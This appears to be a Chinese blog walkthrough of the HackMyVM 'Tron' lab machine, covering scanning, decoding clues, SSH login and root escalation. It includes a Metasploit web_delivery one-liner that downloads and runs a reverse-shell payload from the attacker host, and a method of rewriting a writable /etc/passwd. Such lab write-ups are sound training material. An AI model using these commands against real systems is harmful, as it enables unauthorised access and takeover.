HackMyvm靶机系列(7)-Tron

最新推荐文章于 2024-01-09 15:10:23 发布
最新推荐文章于 2024-01-09 15:10:23 发布
阅读量456 收藏
点赞数
分类专栏: hackmyvm 文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_70727026/article/details/124826203
版权

一、信息收集

如图,老方法,先来一波网段扫描,探测存活主机

nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox

然后使用nmap扫描端口,探测开放的服务,这里发现目标主机开放了ssh服务和http服务

nmap -sC -sV -p- 192.168.200.168

访问目标的http服务,看到如下结果。

然后右键查看源代码,发现下面字符串,看上去像是账号和密码。

 尝试使用下面密码登录目标主机,但是失败了。

kzhh:SbWP9q94ZtE9qD

那就来一波目录扫描吧!看看会不会有什么新的发现

gobuster dir -u http://192.168.200.168/ -w /tools/dict/directory-list-2.3-medium.txt -x php,html,txt,zip,7z,gz,bak -t 30

得到的文件和目录还不少。挨个访问看看。

经过访问,只有在/MCP目录下发现了有效信息

如图,有一个tron.txt文件。

 

访问这个文件看看。

该文件中有一段对话,最下方还有一长串字符串。

将对话翻译看看

最下面这串字符串看上去是base64编码,拿去解码的到如下结果,这看上去也像是一种编码,但是这编码真没见过。

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>++++++++++++.----.-----------.++++++++++++++++++++++++.--------------------.+++++++++++++.

于是百度一波,发现这是barinfuck编码

Brainfuck解释器

Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]

解码得到的结果为player,结合上面的对话,这很有可能是一个用户名。

然后继续访问/MCP/目录下的文件,发现一个文件内容如下。

plaintext ---明文

ciphertext---密文

猜测这里的密码很有可能用了替换加密。这个加密的密码很有可能是之前在网页源代码中看到的注释。

kzhh:SbWP9q94ZtE9qD

二、漏洞利用

如图,对密文进行解密。

 获得密码

pass:SyWP9j94ZgE9jD

脚本如下:

#!/usr/bin/python
# -*- coding: utf-8 -*-


str1 = "abcdefghijklmnopqrstuvwxyz"
str2 = "zyxwvutsrqponmlkjihgfedcba"
ciphertext = "kzhh:SbWP9q94ZtE9qD"
plaintext = ""
for i,c in enumerate(ciphertext):
    if c in str2:
        index = str2.find(c)
        plaintext += str1[index]
    else:
        plaintext += c
print(plaintext)

使用得到的用户名密码登录目标主机。

ssh player@192.168.200.168

拿到第一个flag

 

三、权限提升

输入如下命令

sudo -l

既然不行,那就试试suid和sgid提权吧

输入如下命令

find / -prem -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

结果如图所示,没有发现能够又来提权的文件。

既然这些都不行,那就上传一个脚本,收集一下更为详细的信息吧。

这里我们可以通过nc、curl、wget配合http服务直接在目标机上下载文件,但是我这里最近看到msf上的这个模块,感觉挺有意思的,可以一条命令直接上线msf,我这就使用一波msf啦。

use exploit/multi/script/web_delivery     #这个模块可以通过直接执行命令上线msf
show target                               #查看目标
set target 7
set payload payload/linux/x86/meterpreter/reverse_tcp  #设置payload
set srvport 6666
set lhost 192.168.200.218
run

然后运行模块,会得到下面这条命令

wget -qO 3gsWPNx9 --no-check-certificate http://192.168.200.218:6666/3vM41a0iXQ; chmod +x 3gsWPNx9; ./3gsWPNx9& disown

在目标主机上执行命令

如图,成功上线MSF

上传信息收集脚本到目标机

upload /home/kali/LinEnum.sh

使用脚本收集到的信息很多,我就不一一截图了。

如图,这里发现/etc/passwd文件任何用户是可读可写的。

那么我们是不是可以通过修改/etc/passwd文件来达到提权的效果呢?

linux里与密码相关的文件有两个,/etc/passwd,/etc/shadow

前者存放了一些用户信息,后者存放加密后的密码。但是这里面有个特点,如果/etc/passwd中存放了密码,那么即使这个密码与shadow中不同,但是会优先使用/etc/passwd中的密码。

如图,输入如下命令生成加密后的密码

openssl passwd

使用msf更改/etc/passwd文件,将root密码修改如下。

edit /etc/passwd

这里的root没有开放远程连接,直接在kali上连接会失败。

我们在本地切换到root用户。

如图,成功将权限提升至root,获得第二个flag

 

月应知我意
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hack学习资料.zip
07-25
分享一套学习资料,里面所包含了基本工具、实验环境、信息收集、扫描以及Metasploit之类的教程和资源或者在线网站等等。
渗透靶场——HackMyVM:BlackWidow
tlovejr的博客
04-06 3117
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:192.168.1.11(桥接) 靶机ip地址:(桥接自动获取ip) 目标: user.txt和root.txt 信息收集 扫描主机 arp-scan -l 发现存活主机ip地址:192.168.1.118 扫描端口 扫描靶机开放的服务端口 nmap -A -T4 -p- 192.168.1.118 在这里发现了很多开放的端口,那么我们还是老规矩,先在80端口进
Hackmyvm综合靶机 | Driftingblues-7
IerkeU的博客
04-17 257
前言提要 有史以来最简单的一个靶机,话不多说直接搞
HackMyvm靶机系列(1)-webmaster
qq_70727026的博客
05-10 1147
一、信息收集 首先先使用nmap扫描网段,探测存活主机。 nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox 对目标主机进行端口扫描,探测目标开放的服务 nmap -sT -T4 -sV -O -A -sC -p- 192.168.200.8 扫描到三个服务,ssh,dns,http 访问一下,发现是一张图片,大致意思就是你把密码保存在哪里?Bitwarden和..
渗透靶场——HackMyVM:Pingme
tlovejr的博客
04-13 3146
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:桥接自动获取ip 靶机ip地址:(桥接自动获取ip) 提示信息: CTF 目标: user.txt和root.txt 信息收集 扫描主机 arp-scan -l 发现存活主机192.168.1.10 扫描端口 扫描靶机开放的服务端口 nmap -A -T4 -p- 192.168.1.10 发现还是只有22端口和80端口开放 Web渗透 访问web端口 http:
hackmyvm入门(靶机网络配置)
Bu2n的博客
04-13 6026
hackmyvm概述hackmyvm靶机下载地址靶机网络配置测试环境环境搭建愉快玩耍 hackmyvm概述 hackmyvm是一个平台,包含了大量靶机,类似于vulnhub、hackthebox等平台,你可以在上面下载靶机,进行渗透测试练习,非常适合热爱黑客技术或从事渗透测试的人员。我个人觉得,hackmyvm相比vulnhub好的地方在于它的靶机所占磁盘空间小,hackmyvm靶机一般在1G左右,而vulnhub靶机动不动就2G,甚至我见过还有6G的。不扯这些了,今天是聊一聊hackmyvm到底怎么玩.
hackmyvm System 靶机练习(最玄学的拿root经历)
Bu2n的博客
04-16 652
主机发现端口扫描漏洞挖掘权限提升 主机发现 端口扫描 漏洞挖掘 访问web,发现是一个登录表单 打开burpsuite,抓包分析,发现请求体是xml格式,立马想到XXE 发送到Repeater模块进行测试,发现email那个位置可以利用,因为他在页面上有回显 我在请求体的XML引用了外部实体,结果发现程序启用了外部实体,也就是说这里真有XXE漏洞 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ANY [ <!E.
HackMyvm靶机系列(2)-warrior
qq_70727026的博客
05-11 305
一、信息收集 先扫描网段,探测存活主机,由于是校园网主机太多,我就偷点小懒了哈。 发现目标主机IP nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox 使用nmap对目标端口进行扫描,探测开放的服务。 nmap -sT -T4 -sV -sC -O -A -p- 192.168.200.183 如下图,扫描到两个端口,分别是ssh和http服务 访问一下http服务,查看源代码,然而并没有发现什么有用的信息。 使用dirsearch进行目录扫描。
杂项入门-图片篇(信息附加)
akdelt的博客
11-16 64
StegSolve 打开图片,选中 Analyse 的 File Format 模块。或者 010 最下面得到 flag。
HACK学习呀-内网渗透实践2
快吃小蛋糕吧的博客
04-10 1095
内网渗透-2 公众号上HACK学习呀上面的一篇内网渗透文章,收益颇多,本篇文章实验部分为自己重现 重现时遇到各式各样的奇葩问题,现均已解决 原文链接:https://mp.weixin.qq.com/s/UIGYJvfNAty7ywg3EBjTJw 靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 本次靶场渗透包括反序列化漏洞、命令执行漏洞、Tomcat漏洞、MS系列漏洞、端口转发漏洞、以及域渗透等多种组合漏洞。 知识点 st漏洞利用 php
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机
靶机系列测试 Os-hackNos-11
08-03
1.收集信息 3.对Drupal 7.57进行安全检测 5.解密文件 7.特权提升
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机hackNos Os-Bytesec练习报告1
08-08
id=1yBuih2CsBx45oTUDpFr4JldrzkaOTTeZ https://download.vulnhub.com/hacknos/Os-Byt
hackmyvmtron笔记
最新发布
qq_51230014的博客
01-09 423
但是这里面有个特点,如果/etc/passwd中存放了密码,那么即使这个密码与shadow中不同,但是会优先使用/etc/passwd中的密码。登录遇到如下问题:根据命令行提示,将 /root/.ssh/known_hosts第8行删除即可。linux里与密码相关的文件有两个,/etc/passwd,/etc/shadow。对最下面一行解码,先base64,后Brainfuck,得到用户player。如下命令生成加密后的密码,记住输入的原始密码,一会儿切换到root要用到。寻找可以修改的敏感文件
Hack the box -- 靶机渗透测试(TIER2)
wjishuxiaobai的博客
06-25 1567
本文针对Hack the box 靶机TIER2渗透过程进行记录。开启在线靶机靶机IP为10.129.88.20。端口扫描 扫描命令 sudo nmap -sC -sV 10.129.88.20, 发现1443端口开启了smb服务,所以尝试使用smbclient连接。smbclient连接 命令为:smbclient -N -L 10.129.88.20(-N表示无密码登录,-L可以查看服务器上可用服务) 通过查找发现在backups目录下存在一个配置文件prod.dtsConfig,将其下载本地进
Linux入门指北】第四篇 网络配置
guanguan12319的博客
04-22 2375
Linux入门指北】第四篇 网络配置
Hack The Box 系列域渗透之靶机Multimaster
二狗的博客
02-03 1222
本小白最近在学域渗透,决定把Hack The Box的Active Directory 101系列域渗透靶机打完,并详细记录当中用到的工具、知识点及其背后的原理。本篇文章是该系列的第九篇,靶机名字为Multimaster,这是一台疯狂难度的靶机
例举使用Nmap工具对靶机Metasploitable2-XP和Metasploitable2-Linux进行端口扫描
05-26
Nmap是一款强大的网络发现和安全审计工具,可以用来扫描目标主机的端口和服务,以确定其漏洞和安全风险。 以下是使用Nmap工具对Metasploitable2-XP和Metasploitable2-Linux进行端口扫描的步骤: ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值